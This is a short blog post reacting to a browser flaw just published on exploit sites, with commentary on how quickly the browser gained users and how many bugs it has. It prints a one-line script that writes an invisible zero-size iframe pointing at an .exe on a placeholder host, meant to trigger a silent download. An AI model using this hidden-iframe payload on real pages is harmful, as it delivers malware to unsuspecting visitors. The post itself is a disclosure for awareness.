As I said my previous post was destined to be outated very soon.
This is what appeared few minutes ago on milw0rm and packetstorm:
< script > document.write('< iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0" >'); < / script >
This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.
Today Hackers Center stats showed 13% of visitors using the new raw browser.
This is temporary peak, but still scary considering all the bugs found in less than 48 hours.
I think Google will soon regret about this too-soon release
Posts
